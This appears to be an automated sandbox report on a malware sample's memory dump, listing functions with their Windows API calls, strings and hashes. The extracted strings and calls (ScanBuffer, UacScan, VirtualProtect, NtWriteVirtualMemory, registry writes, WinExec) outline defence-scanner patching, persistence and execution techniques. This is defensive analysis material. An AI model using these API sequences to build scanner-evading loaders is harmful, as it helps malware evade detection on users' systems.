Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: CountTick$Sleep
String ID: 500
API String ID: 4250438611-612300854
Opcode ID: 52bf5a79658ce33e305b08668994c51c8847e1e4e7dddae6fe1c9898be7170f2
Instruction ID: e3f515b964744bc45bc0f2a8ed6555f6f4ab047ba92d332586ecffef69867549
Opcode Fuzzy Hash: 52bf5a79658ce33e305b08668994c51c8847e1e4e7dddae6fe1c9898be7170f2
Instruction Fuzzy Hash: A2C080D629110D0EC5007DF56DD457F064D87D07127103E72F006C5180C615C9516966

Function 0291A12C Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON

Download Yara Rule

APIs

Part of subcall function 02919EB0: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0291A13D

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
String ID:
API String ID: 2242398760-0
Opcode ID: e428e787eb020c47e873283dd9b1c451cdb7cb95c3e9e39ed3b34a4b3bae3c6d
Instruction ID: cd35791cb69685a89eb8acebf8caa1ee3e4acd778825c2c397be450cbb5c61d0
Opcode Fuzzy Hash: e428e787eb020c47e873283dd9b1c451cdb7cb95c3e9e39ed3b34a4b3bae3c6d
Instruction Fuzzy Hash: A9C08062E06224575B1065F97DCC8D3474DCD451F731408A2B50DD3111D7254C10D190

Function 0292326A Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 946
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

Part of subcall function 0291D310: RegOpenKeyA.ADVAPI32(?,00000000,0293F644), ref: 0291D354
Part of subcall function 0291D310: RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D38C
Part of subcall function 0291D310: RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D397

WinExec.KERNEL32(00000000,00000000), ref: 02923B77

Part of subcall function 0291A18C: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 0291A24F

RtlMoveMemory.NTDLL(00000000,00000004,00000000), ref: 029240F9

Strings

UacInitialize, xrefs: 02923AE3
C:\Users\Public\, xrefs: 029234D6
OpenSession, xrefs: 0292336E, 0292357A, 029236EE, 02923862, 02923A67, 02923C80, 02923D23, 02923EB6, 02924186
Initialize, xrefs: 029232F2, 029238DE
ScanBuffer, xrefs: 02923466, 0292395A, 029239EB, 02923E1B, 02923FAE, 0292410A, 0292427E
C:\Windows\System32\, xrefs: 02923B61
ScanString, xrefs: 02923276, 0292376A, 02923C04, 0292406B
UacScan, xrefs: 029233EA, 029235F6, 02923672, 029237E6, 02923B88, 02923D9F, 02923F32, 02924202

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 897696978-872072817
Opcode ID: cf7d3ae11b961da8c9e235b14df6fcc78ff3516fcf95f4c15f7dd085858c1bff
Instruction ID: b59b439b7218cec6741c2d1952e70196507997b7d8a8091c1b12ee03b936f8c1
Opcode Fuzzy Hash: cf7d3ae11b961da8c9e235b14df6fcc78ff3516fcf95f4c15f7dd085858c1bff
Instruction Fuzzy Hash: 8E920A35A5016D8FEB10EBA4CDC0EE9B3B6AFC5314F1055E2E509A7294DE30AE99CF11

Function 02901727 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 029017D0
Sleep.KERNEL32(0000000A,00000000), ref: 029017E6

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0fd05c815a885bea6204ce415cbb64ae72df38e8088e1c929e18d119efd12e51
Instruction ID: b5be7d7ffce9582f4de4a7b0b8ba880e40e6679b6ee39e10d6c72c8d10c93daf
Opcode Fuzzy Hash: 0fd05c815a885bea6204ce415cbb64ae72df38e8088e1c929e18d119efd12e51
Instruction Fuzzy Hash: 95B15172A05B458FCB15CF68E8C0366BBE1FB85360F1886AED85E9B3C5C770A551CB90

Function 02900CBD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
lstrlen.KERNEL32(00000000), ref: 02905BD2
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C29
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C61
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C97

Part of subcall function 029058B4: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 029058D1
Part of subcall function 029058B4: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 029058E8
Part of subcall function 029058B4: lstrcpyn.KERNEL32(?,?,?), ref: 02905918

Strings

Software\Borland\Delphi\Locales, xrefs: 02905AE4

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$LocaleQueryValue$AddressCloseHandleInfoModuleOpenProcThreadlstrlen
String ID: Software\Borland\Delphi\Locales
API String ID: 242553506-388148995
Opcode ID: 6f77d18874a18cdf12b0128415028217c590d483b5cae34063a6c6c0fee0aa7a
Instruction ID: b1f1c1e4fb7e67eb4c241204af1aa86213300e005d540a027698b7bece41a054
Opcode Fuzzy Hash: 6f77d18874a18cdf12b0128415028217c590d483b5cae34063a6c6c0fee0aa7a
Instruction Fuzzy Hash: 05117C7160024CAEFB1186A48C96FEFBBBCFB48714F924099EA01EA1C1D674A904DF65

Function 02917D2C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D6D
GetProcAddress.KERNEL32(00000000,kernel32), ref: 02917D73
VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D8D

Strings

kernel32, xrefs: 02917D68
irtualProtect, xrefs: 02917D45

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID: irtualProtect$kernel32
API String ID: 2099061454-2063912171
Opcode ID: 069fdec0591647bcbaee8d878b7fdfed9a52130bda56fadfa0d6a7e1e602058e
Instruction ID: cfcfff23ae289e2454732d5d16bbabf3d821aaa32e851a2a5d565707b9180947
Opcode Fuzzy Hash: 069fdec0591647bcbaee8d878b7fdfed9a52130bda56fadfa0d6a7e1e602058e
Instruction Fuzzy Hash: 9D014B7964420DAFEB00EFE9DC81EAEB7EDEF89710F514460BA14D76C0D734AA108B25

Function 02901A8F Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02901B17
Sleep.KERNEL32(0000000A,00000000), ref: 02901B31

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9910c928067515cc03f7bf918f74a2b929b4695dc94c3e301a6163341544c5ea
Instruction ID: 6155f374303bcc82cd0fd03ebe9b515b4804e7501acc21716df2de80468f763a
Opcode Fuzzy Hash: 9910c928067515cc03f7bf918f74a2b929b4695dc94c3e301a6163341544c5ea
Instruction Fuzzy Hash: E3510E71A042448FEB15CF6CC9C4766BBD8AF89314F1885AED84DCB2C6E7B0C445CBA1

Function 0291CF46 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291D086

Strings

Initialize, xrefs: 0291CF76
ScanBuffer, xrefs: 0291CFCF
OpenSession, xrefs: 0291D028

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 5b540964a93988469de83d88fad7d2b9396aed8c993321d8aea5b2f3dd49b929
Instruction ID: 405f2a2270bfa87ccad4478eef65b1af8d207ddbe74c91c7425d857585e98472
Opcode Fuzzy Hash: 5b540964a93988469de83d88fad7d2b9396aed8c993321d8aea5b2f3dd49b929
Instruction Fuzzy Hash: 72410B35B1010D9FEB10EBE5C881E9EB3FAEFC8710F215471E551A7280DA74AD068F65

Function 02915BA4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CEC,?,?,02913878,00000001), ref: 02915C00
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CEC,?,?,02913878,00000001), ref: 02915C2E

Part of subcall function 02907D08: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02913878,02915C6E,00000000,02915CEC,?,?,02913878), ref: 02907D56

Part of subcall function 02907F10: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02913878,02915C89,00000000,02915CEC,?,?,02913878,00000001), ref: 02907F2F

GetLastError.KERNEL32(00000000,02915CEC,?,?,02913878,00000001), ref: 02915C93

Part of subcall function 0290A6F0: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0290C351,00000000,0290C3AB), ref: 0290A70F

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: f22af803d976d8b14e3cc7d9bce511288e11c4d163ea81fb6dfd3395189d86d5
Instruction ID: 78c623075ab98c2406ccecc5e53c6c8585f4b4c19d9c40f13164a04b86ee8bdf
Opcode Fuzzy Hash: f22af803d976d8b14e3cc7d9bce511288e11c4d163ea81fb6dfd3395189d86d5
Instruction Fuzzy Hash: 32316070A0030C9FDB00EFA9C8C0BAEBBF6AF88714F918469E904A73C1D77559458FA5

Function 02917DF4 Relevance: 4.6, APIs: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

Part of subcall function 02917D2C: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D6D
Part of subcall function 02917D2C: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02917D73
Part of subcall function 02917D2C: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D8D

Part of subcall function 02917B3C: GetModuleHandleW.KERNEL32(KernelBase,00000000,02917C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02917BBE
Part of subcall function 02917B3C: GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02917BC4
Part of subcall function 02917B3C: GetCurrentProcess.KERNELBASE ref: 02917BCE

Part of subcall function 02917A74: GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02917AF8,?,?,00000000), ref: 02917AB8
Part of subcall function 02917A74: GetProcAddress.KERNEL32(00000000,ntdll), ref: 02917ABE
Part of subcall function 02917A74: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917ADC

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleModuleProc$Virtual$CurrentLibraryLoadMemoryProcessProtectWrite
String ID:
API String ID: 3496194007-0
Opcode ID: 1adb014de1a2b7f29644880330c6341a881c61bfa37de3ea43b9287ac6767677
Instruction ID: 05585ea647e058226c18c32c0701c444ede16eb2308853919986671c014aa6db
Opcode Fuzzy Hash: 1adb014de1a2b7f29644880330c6341a881c61bfa37de3ea43b9287ac6767677
Instruction Fuzzy Hash: 57114CB1E4470DAFE704FBE5DC81E6EB7EAEB85700F500464A214A76D0DB38A9108B24

Function 0291D30E Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,0293F644), ref: 0291D354
RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D38C
RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D397

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: d965a4225a0200249f8e7f0b2c13bd5b98b3bd907eae5101c48c15ac53f631da
Instruction ID: 11abd3d2ed88f17c2d34f2104150ac275cafb559cc26e36410c7699f40bb05b5
Opcode Fuzzy Hash: d965a4225a0200249f8e7f0b2c13bd5b98b3bd907eae5101c48c15ac53f631da
Instruction Fuzzy Hash: 67110A71A0420CAFEB00EBA8D8C1D6E7BEDEB89714F501471BA14D76A0D730EE51DE60

Function 0291D310 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,0293F644), ref: 0291D354
RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D38C
RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D397

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 88438a3781070a75d5e7a5b665d5cd86b10a61c072c887517b55013db86d6b41
Instruction ID: dae4a0bd78d2a7f0dad98ea966402adff2f69e419ece1b5dbeeb1c7725af258a
Opcode Fuzzy Hash: 88438a3781070a75d5e7a5b665d5cd86b10a61c072c887517b55013db86d6b41
Instruction Fuzzy Hash: E0111C71A0420CAFEB00EBA8D8C1D6E7BEDEB89714F501471BA14D76A0D730EA51DE60

Function 0290E2DC Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0290E2EB

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 77201f0608cdf0e6bb5706455c83fe758a1c90666a7f7593dde87d1a8bdfdfea
Instruction ID: fc6194751b3b4f3c8feef15b93acb662b9b494fa55da198915dd4f70077b8a36
Opcode Fuzzy Hash: 77201f0608cdf0e6bb5706455c83fe758a1c90666a7f7593dde87d1a8bdfdfea
Instruction Fuzzy Hash: 38F0F666B0411C8FDB207B38C8C466D3B9E9F847407449C36E4C6DB2C9CB24DC05CB62

Function 02917054 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02917352

Strings

H, xrefs: 02917109

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: d698fa123a9de89382e8b54b24f2e5780c037bfa107c682604f2f096ec509d80
Instruction ID: 33b8cb01c53913d44aa49e06bec8a98da7f437703ba555f33702fe9e7ce8c23b
Opcode Fuzzy Hash: d698fa123a9de89382e8b54b24f2e5780c037bfa107c682604f2f096ec509d80
Instruction Fuzzy Hash: 97B1C274A01609EFDB14CF9AD980A9DFBF6FF89314F248569E805AB364D730A846CF50

Function 02904168 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77abbd4f213636ca243bb1d13908da3d5c670813edacc6e7bc1d7e6a9bae2559
Instruction ID: dbfbda11607731f6527cecb10c5def6c104d62df67c54f9cb143da7939458e10
Opcode Fuzzy Hash: 77abbd4f213636ca243bb1d13908da3d5c670813edacc6e7bc1d7e6a9bae2559
Instruction Fuzzy Hash: 4B41AC75D48208DFDF24DF28E4C47AA3BE9FF89314F15692AEA09972C0C7309894CB41

Function 0290E6D8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0290E6F9

Part of subcall function 0290E2DC: VariantClear.OLEAUT32(?), ref: 0290E2EB

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: f7d6229ee1af9f4b5506cc721c92a5a76587ccbc4912b617a231d74e482508b6
Instruction ID: 39f4fd14dbe854a31c5bd53cbea1faf0a90efce235c01a1993b6b66f825b2e89
Opcode Fuzzy Hash: f7d6229ee1af9f4b5506cc721c92a5a76587ccbc4912b617a231d74e482508b6
Instruction Fuzzy Hash: D6118660B0421C8FCB20AF69C8C466677DADFC57507005C6AE6CA8B2D5DB30DC41CBA2

Function 02904C48 Relevance: 3.0, APIs: 2, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02904C1A
SysReAllocStringLen.OLEAUT32(?,?,?), ref: 02904C62

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0dfb876fbd1d1730c24048f7b13a568e459e49fe3a1b4105be2b01b296b86e1a
Instruction ID: 1e4005cf4f0cc430b2bc1adc830c59cca0dba0596fe2161b5431fa2f3c4126cd
Opcode Fuzzy Hash: 0dfb876fbd1d1730c24048f7b13a568e459e49fe3a1b4105be2b01b296b86e1a
Instruction Fuzzy Hash: 6DE0C2B45002095EEB189E1989C0B77336EAFD0706B28EA9CAA018F1C0EB308800CA30

Function 02904CFC Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02904C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02904D07
SysFreeString.OLEAUT32(00000000), ref: 02904D19

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: fbcbc079c08d05a5a061a6d9bb9e7b58ab4b23161b06f71646831e832a5bb596
Instruction ID: 49b82d4bc28fef33cbb4c8c190815a694ba9cf70e570d83a55a830798a9bd1b9
Opcode Fuzzy Hash: fbcbc079c08d05a5a061a6d9bb9e7b58ab4b23161b06f71646831e832a5bb596
Instruction Fuzzy Hash: 5FC012B810520A6EAB082B604EC493B2B2DAEC534034018A9AA14C80E0E724C841AC20

Function 0290E374 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0290E3B4

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: e8d69a1a8ac1f396f821378c3d4b46892423d89040ec255c12b65c9ea9702c3c
Instruction ID: 8bea8f27bbf6b6e807038f2d30f1bb631603a83312c31819f8bd2f1d2ca3ef0b
Opcode Fuzzy Hash: e8d69a1a8ac1f396f821378c3d4b46892423d89040ec255c12b65c9ea9702c3c
Instruction Fuzzy Hash: EF314D71A0420CAFDB15DEA8C9C4AAA7BACEB4C304F444965FA99D32D0D734D994CB62

Function 0294714D Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,029470C7,?,?,?,?,?), ref: 02947160

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002947000.00000040.00001000.00020000.00000000.sdmp, Offset: 02947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2947000_HGTQP09643009.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction ID: 52ada63360e4ee8d91d53ef81b6e6c500d9b1aa64263f58dcce2ad3704645bd5
